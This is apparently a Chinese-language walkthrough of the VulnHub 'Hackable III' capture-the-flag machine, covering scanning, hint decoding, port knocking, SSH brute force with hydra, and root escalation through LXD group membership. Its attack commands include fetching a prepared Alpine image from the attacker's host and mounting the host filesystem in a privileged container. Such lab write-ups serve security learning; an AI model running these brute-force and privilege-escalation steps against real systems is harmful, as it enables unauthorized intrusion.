靶机描述

靶机地址：https://download.vulnhub.com/hackable/hackable3.ova

Description

Focus on general concepts about CTF
Difficulty: Medium
This works better with VirtualBox rather than VMware.

信息收集

nmap探测详细端口信息

nmap -sS -sV -A -p- 192.168.56.106

探测到了robots.txt

Web发现

查看页面源代码发现

发现了登录地址login_page/login.html，还有一个用户名jubiscleudo，还提示了端口敲门

端口敲门(端口碰撞)技术是一种通过在一组预先指定的关闭端口上产生连接请求，从外部打开防火墙上的端口的方法。一旦收到正确的连接请求序列，防火墙规则就会被动态修改，以允许发送连接请求的主机通过特定端口进行连接。也就是说，攻击者可能通过端口扫面来利用一些端口服务来发动攻击，但是一些固定的端口又需要开放来满足远程维护需求，因此，我们可以使用端口碰撞技术来形成一个访问控制。我们需要去碰撞一个特定的端口序列，才能够打开我们想要访问的端口。

登录页面

查看下robots.txt

查看/config

有一个1.txt

base64解码得到：10000，应该是端口敲门的端口之一

目录扫描

dirsearch -u http://192.168.56.106/

访问一下http://192.168.56.106/backup/

发现一个密码本

访问css页面，发现里面有个2.txt文件

Brainfuck解码

访问登录页面 http://192.168.56.106/login.php，查看源码

访问一下3.jpg

图片隐写

看完了总结一下端口信息：4444、10000、65535

SSH登录

按照文件名的顺序进行端口敲门10000、4444、65535

knock 192.168.56.106 10000 4444 65535
nmap -A -p- 192.168.56.106

ssh打开后，用我们之前发现的用户名jubiscleudo，和发现的字典进行爆破

hydra -l jubiscleudo -P wordlist.txt 192.168.56.106 ssh

ssh登录

提权

查看下系统内的文件

逐个访问目录，在访问/var/www/html下有隐藏文件.back_config.php，打开后得到hackable_3密码

hackable_3/TrOLLED_3

切换用户

通过id命令可以看到该用户在lxd组中(lxd和docker一样，是一种容器)

参考：https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

由于靶机不出网，需要本地下载Alpine镜像

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

生成.tar.gz文件，打开server服务，传输给目标机

python -m SimpleHTTPServer

目标机获取镜像，将其以镜像的形式添加进LXD

wget http://192.168.75.150:8000/alpine-v3.16-x86_64-20220920_2354.tar.gz
lxc image import ./alpine-v3.16-x86_64-20220920_2354.tar.gz --alias myimage
lxc image list
.tar.gz文件是根据时间生成的，需要根据自己情况更改名称，--alias后的名称也可以自己定义

初始化Container，否则在加载容器时会显示没有存储池

lxd init
一路回车

执行如下命令，成功提权

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

获取flag